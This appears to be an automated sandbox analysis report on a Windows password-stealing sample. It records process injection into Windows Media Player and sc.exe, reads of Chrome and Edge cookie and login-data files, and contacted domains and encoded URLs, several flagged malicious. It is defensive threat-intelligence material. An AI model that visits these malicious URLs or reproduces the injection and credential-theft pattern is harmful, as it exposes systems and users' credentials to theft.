Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2B19008	Jump to behavior

Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Windows Analysis Report SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\unregmp2.exe	Queries volume information: C:\ VolumeInformation

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
156.251.142.107	lcmoji.lc301adbt.com	Seychelles	40065	CNSERVERSUS	false
23.105.172.12	www.primefindsstore.shop	United States	30633	LEASEWEB-USA-WDCUS	true
64.190.62.22	www.hondamechanic.today	United States	11696	NBS11696US	true
203.161.49.220	www.vertilehub.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
142.250.185.83	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
81.88.48.71	limpiezasbarcelo.com	Italy	39729	REGISTER-ASIT	true
89.31.143.90	www.le-kuk.shop	Germany	15598	QSC-AG-IPXDE	true
152.32.156.214	www.xuzfceth.com	Hong Kong	135377	UHGL-AS-APUCloudHKHoldingsGroupLimitedHK	true
185.151.30.199	www.salecost.co.uk	United Kingdom	48254	TWENTYIGB	true
81.88.57.70	onstatic-pt.setupdns.net	Italy	39729	REGISTER-ASIT	true

Name	Malicious	Antivirus Detection	Reputation
http://www.bayviewcribbage.com/odz6/	false	Avira URL Cloud: safe	unknown
http://www.le-kuk.shop/obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk=	true	Avira URL Cloud: safe	unknown
http://www.videos60.com/hfmm/	true	Avira URL Cloud: safe	unknown
http://www.salecost.co.uk/lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk=	true	Avira URL Cloud: safe	unknown
http://www.limpiezasbarcelo.com/utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN	true	Avira URL Cloud: safe	unknown
http://www.xuzfceth.com/wvfe/	true	Avira URL Cloud: safe	unknown
http://www.salecost.co.uk/lxk5/	true	Avira URL Cloud: safe	unknown
http://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN	false	Avira URL Cloud: safe	unknown
http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=	true	Avira URL Cloud: malware	unknown
http://www.top65s.com/awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0=	false	Avira URL Cloud: safe	unknown
http://www.primefindsstore.shop/hfkt/	true	Avira URL Cloud: safe	unknown
http://www.xuzfceth.com/wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk=	true	Avira URL Cloud: safe	unknown
http://www.top65s.com/awbu/	false	Avira URL Cloud: safe	unknown
http://www.videos60.com/hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN	true	Avira URL Cloud: safe	unknown
http://www.vertilehub.xyz/ei4t/	true	Avira URL Cloud: malware	unknown
http://www.primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA=	true	Avira URL Cloud: safe	unknown
http://www.limpiezasbarcelo.com/utkc/	true	Avira URL Cloud: safe	unknown

ID:	1467140
Product:	CloudBasic
Start time:	18:51:08
Start date:	03.07.2024
Sample:	SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0d866e84b1b42f3b924d671db5b3b40e
SHA1:	8890d49ef3267c6c6697c0e56b85ce118e0f7eef
SHA256:	74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
